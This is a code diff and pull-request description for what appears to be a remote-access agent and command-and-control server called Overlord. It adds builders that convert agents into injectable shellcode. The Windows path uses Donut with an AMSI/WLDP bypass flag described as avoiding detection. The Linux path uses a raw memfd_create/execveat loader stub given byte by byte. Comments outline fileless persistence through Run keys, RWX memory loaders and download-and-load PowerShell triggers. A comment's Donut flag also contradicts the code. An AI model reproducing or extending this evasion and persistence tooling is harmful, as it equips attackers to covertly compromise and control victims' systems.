+): Promise<string | null> {
+  const bin = binaryPath();
+  const cached = readCache();
+  const binExists = fs.existsSync(bin);
+  const stale = !cached || Date.now() - cached.cachedAt > VERSION_TTL_MS;
+
+  const log = (text: string, level = "info") => {
+    logger.info(`[donut] ${text.trim()}`);
+    sendToStream?.({ type: "output", text: `${text}\n`, level });
+  };
+
+  if (binExists && !stale) {
+    log(`Donut: using cached ${cached!.tag}`);
+    return bin;
+  }
+
+  // Prefer a system-installed binary (e.g. pre-fetched in Docker image) before
+  // hitting GitHub. If found, record it so future calls skip the check.
+  const sysBinEarly = await findSystemDonut();
+  if (sysBinEarly) {
+    log(`Donut: using system binary at ${sysBinEarly}`);
+    writeCache("system");
+    return sysBinEarly;
+  }
+
+  log("Donut: checking GitHub for latest release…");
+  const latest = await fetchLatest();
+
+  if (!latest) {
+    if (binExists) {
+      log(`Donut: GitHub unreachable — using cached ${cached?.tag ?? "unknown"}`, "warn");
+      return bin;
+    }
+    log("Donut: GitHub unreachable and no binary available", "error");
+    return null;
+  }
+
+  if (binExists && cached?.tag === latest.tag) {
+    log(`Donut: already at latest (${latest.tag})`);
+    writeCache(latest.tag); // refresh TTL
+    return bin;
+  }
+
+  log(`Donut: downloading ${latest.tag}…`);
+  const ok = await downloadBinary(latest.downloadUrl, bin, latest.isArchive);
+  if (!ok) {
+    if (binExists) {
+      log(`Donut: download failed — using cached ${cached?.tag ?? "unknown"}`, "warn");
+      return bin;
+    }
+    log("Donut: download failed and no cached binary available", "error");
+    return null;
+  }
+
+  writeCache(latest.tag);
+  log(`Donut: ready (${latest.tag})`);
+  return bin;
+}
+
+/**
+ * Converts a Windows PE executable to position-independent shellcode using Donut.
+ *
+ * Flags used:
+ *   -f 1   raw shellcode output (no base64/C/etc wrapping)
+ *   -a 1|2 architecture (1=x86, 2=x64)
+ *   -b 2   bypass AMSI + WLDP by returning failure (abort) — avoids detection
+ *   -x 1   exit by thread exit, not process exit — prevents crashing the host
+ *
+ * NOTE — persistence in shellcode mode:
+ *   When the agent runs as shellcode injected into another process, os.Executable()
+ *   on Windows resolves to the HOST process binary via GetModuleFileNameW(NULL).
+ *   Persistence methods (startup, registry, taskscheduler, wmi) would therefore
+ *   register the HOST executable for autostart — not the agent — which is wrong.
+ *
+ *   Theoretical fixes:
+ *   1. Server-side stage-2 push: after first connection the server sends agent_update
+ *      with a PE binary (persistence-enabled). Agent writes it to disk + registers.
+ *   2. Registry shellcode blob: store raw shellcode in a Run key with a PowerShell
+ *      loader stub that allocates RWX memory, copies the blob, and CreateThread's it.
+ *      Requires a new persist_shellcode_registry build tag in the agent.
+ *   3. WMI/task scheduler with a PS one-liner that downloads and reflectively loads
+ *      the shellcode each time the trigger fires (fully fileless persistence).
+ *   4. Self-droping: on first run, agent uses VirtualQuery on a known code pointer to
+ *      locate its own loaded image, writes it to a temp path, and registers from there.
+ */
+export async function runDonut(
+  inputPe: string,
+  outputBin: string,
+  arch: "amd64" | "386",
+  sendToStream: (data: any) => void,
+): Promise<boolean> {
+  const bin = await ensureDonut(sendToStream);
+  if (!bin) {
+    sendToStream({ type: "output", text: "ERROR: Donut binary not available\n", level: "error" });
+    return false;
+  }
+
+  const archFlag = arch === "386" ? "1" : "2";
+
+  try {
+    // -i flag required since donut v1 (previously positional arg)
+    const result = await $`${bin} -f 1 -a ${archFlag} -b 3 -x 1 -o ${outputBin} -i ${inputPe}`
+      .nothrow()
+      .quiet();
+    const stdout = result.stdout.toString().trim();
+    if (stdout) {
+      sendToStream({ type: "output", text: stdout + "\n", level: "info" });
+    }
+    if (result.exitCode !== 0) {
+      const stderr = result.stderr.toString().trim();
+      sendToStream({ type: "output", text: `Donut failed (exit ${result.exitCode})${stderr ? `: ${stderr}` : ""}\n`, level: "error" });
+      return false;
+    }
+    const outSize = fs.existsSync(outputBin) ? fs.statSync(outputBin).size : 0;
+    if (outSize === 0) {
+      sendToStream({ type: "output", text: "Donut produced no output — check that the input PE is valid\n", level: "error" });
+      return false;
+    }
+    return true;
+  } catch (err: any) {
+    sendToStream({ type: "output", text: `Donut error: ${err?.message ?? err}\n`, level: "error" });
+    return false;
+  }
+}

--- a/Overlord-Server/src/server/linux-shellcode-manager.ts
+++ b/Overlord-Server/src/server/linux-shellcode-manager.ts
@@ -1,0 +1,65 @@
+import fs from "fs";
+import path from "path";
+
+// 113-byte x86_64 Linux ELF-in-memory loader shellcode stub
+// Entry: executes ELF appended after stub via memfd_create + execveat (syscalls 319, 1, 322)
+// Layout after stub: [uint32le ELF size][ELF bytes]
+// Source: Overlord-Server/tools/elf_loader.asm
+const ELF_LOADER_STUB_X64 = new Uint8Array([
+  0xe8, 0x02, 0x00, 0x00, 0x00, 0x6d, 0x00, 0x5b, 0x48, 0x89, 0xdf, 0x6a,
+  0x01, 0x5e, 0x68, 0x3f, 0x01, 0x00, 0x00, 0x58, 0x0f, 0x05, 0x48, 0x85,
+  0xc0, 0x78, 0x4e, 0x50, 0x41, 0x5c, 0x48, 0x8d, 0x4b, 0x6c, 0x8b, 0x11,
+  0x48, 0x8d, 0x71, 0x04, 0x85, 0xd2, 0x74, 0x1a, 0x52, 0x56, 0x41, 0x54,
+  0x5f, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x5e, 0x5a, 0x48, 0x85,
+  0xc0, 0x7e, 0x2a, 0x48, 0x01, 0xc6, 0x29, 0xc2, 0xeb, 0xe2, 0x6a, 0x00,
+  0x48, 0x8d, 0x34, 0x24, 0x6a, 0x00, 0x48, 0x8d, 0x14, 0x24, 0x6a, 0x00,
+  0x4c, 0x8d, 0x14, 0x24, 0x41, 0x54, 0x5f, 0x41, 0xb8, 0x00, 0x10, 0x00,
+  0x00, 0x68, 0x42, 0x01, 0x00, 0x00, 0x58, 0x0f, 0x05, 0x6a, 0x01, 0x5f,
+  0x6a, 0x3c, 0x58, 0x0f, 0x05,
+]);
+
+/**
+ * Wraps a Linux ELF binary in a position-independent shellcode stub.
+ *
+ * The result is raw x86_64 shellcode that, when executed, uses
+ * memfd_create + execveat to load and run the embedded ELF entirely
+ * from anonymous memory — no file is written to disk.
+ *
+ * Layout: [113-byte stub][4-byte LE ELF size][ELF bytes]
+ */
+export function wrapElfAsShellcode(elfBytes: Buffer): Buffer {
+  const stub = ELF_LOADER_STUB_X64;
+  const sizeBuf = Buffer.alloc(4);
+  sizeBuf.writeUInt32LE(elfBytes.length, 0);
+  return Buffer.concat([Buffer.from(stub), sizeBuf, elfBytes]);
+}
+
+/**
+ * Reads elfPath, wraps it, writes shellcode to scPath.
+ * Returns size of output on success.
+ */
+export function buildLinuxShellcode(
+  elfPath: string,
+  scPath: string,
+  sendToStream: (data: any) => void,
+): boolean {
+  try {
+    const elfBytes = fs.readFileSync(elfPath);
+    const sc = wrapElfAsShellcode(elfBytes);
+    fs.mkdirSync(path.dirname(scPath), { recursive: true });
+    fs.writeFileSync(scPath, sc);
+    sendToStream({
+      type: "output",
+      text: `Linux shellcode: ${elfBytes.length} byte ELF → ${sc.length} byte stub (${sc.length - elfBytes.length} byte header)\n`,
+      level: "info",
+    });
+    return true;
+  } catch (err: any) {
+    sendToStream({
+      type: "output",
+      text: `Linux shellcode wrap failed: ${err.message ?? err}\n`,
+      level: "error",
+    });
+    return false;
+  }
+}

--- a/Overlord-Server/src/server/routes/build-routes.ts
+++ b/Overlord-Server/src/server/routes/build-routes.ts
@@ -110,6 +110,9 @@ export async function handleBuildRoutes(
         sleepSeconds,
         boundFiles,
         iosBundleId,
+        useDonut,
+        useLinuxShellcode,
+        shellcodeConsole,
       } = body;
 
       if (!platforms || !Array.isArray(platforms) || platforms.length === 0) {
@@ -376,6 +379,9 @@ export async function handleBuildRoutes(
         sleepSeconds: safeSleepSeconds,
         boundFiles: safeBoundFiles,
         iosBundleId: typeof iosBundleId === "string" && /^[a-zA-Z0-9.-]{1,128}$/.test(iosBundleId.trim()) ? iosBundleId.trim() : undefined,
+        useDonut: !!useDonut,
+        useLinuxShellcode: !!useLinuxShellcode,
+        shellcodeConsole: !!shellcodeConsole,
       }).finally(() => {
         if (rateLimitActive) recordBuildEnd(user.userId);
       });

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -4,10 +4,6 @@ services:
     build:
       context: .
       dockerfile: Dockerfile
-      cache_from:
-        - type=local,src=.docker-cache/buildx
-      cache_to:
-        - type=local,dest=.docker-cache/buildx,mode=max
     container_name: overlord-server
     # Host networking: the container shares the host's network stack directly.
     # Every port the server binds (5173, SOCKS5 proxies, etc.) is accessible
@@ -61,7 +57,7 @@ services:
       - no-new-privileges:true
     healthcheck:
       # Use http:// when OVERLORD_TLS_OFFLOAD=true.
-      test: ["CMD-SHELL", "curl -f ${OVERLORD_HEALTHCHECK_URL:-https://localhost:5173/health} >/dev/null 2>&1 || exit 1"]
+      test: ["CMD-SHELL", "wget -qO- --no-check-certificate ${OVERLORD_HEALTHCHECK_URL:-https://localhost:5173/health} >/dev/null 2>&1 || exit 1"]
       interval: 30s
       timeout: 10s
       retries: 3


### PR DESCRIPTION
- Donut (Windows): PE → PIC shellcode (.bin) via donut-manager.ts Flags: -f1 -a<arch> -b3 -x1 (continue on AMSI fail, thread exit)
- Linux shellcode: 113-byte x86_64 memfd_create+execveat stub (linux-shellcode-manager.ts) wraps ELF for memfd_create+execveat
- Two-pass build for shellcode+persistence: Pass 1 = normal agent with persist compiled in; Pass 2 = selfembed agent that drops+registers Pass 1 on first run (isRunningInMemory() gates the path)
- Show console option: shellcode_console build tag calls AllocConsole() on start for debug builds; AttachConsole fallback included
- isRunningInMemory() Windows: VirtualQuery on .data sentinel (MEM_PRIVATE = injected, MEM_IMAGE = normal disk load) replaces os.Executable() which returned host process path when injected
- Build UI: Donut mode, Linux shellcode mode, show-console checkboxes; settings persisted across sessions via collectFormSettings()
- GODEBUG=netdns=cgo hardcoded in build env (fixes IPv6 DNS on VPN)
- Dockerfile: pre-seed Go module cache; add curl to runtime image
- docker-compose.yml: switch healthcheck to wget (curl absent in slim)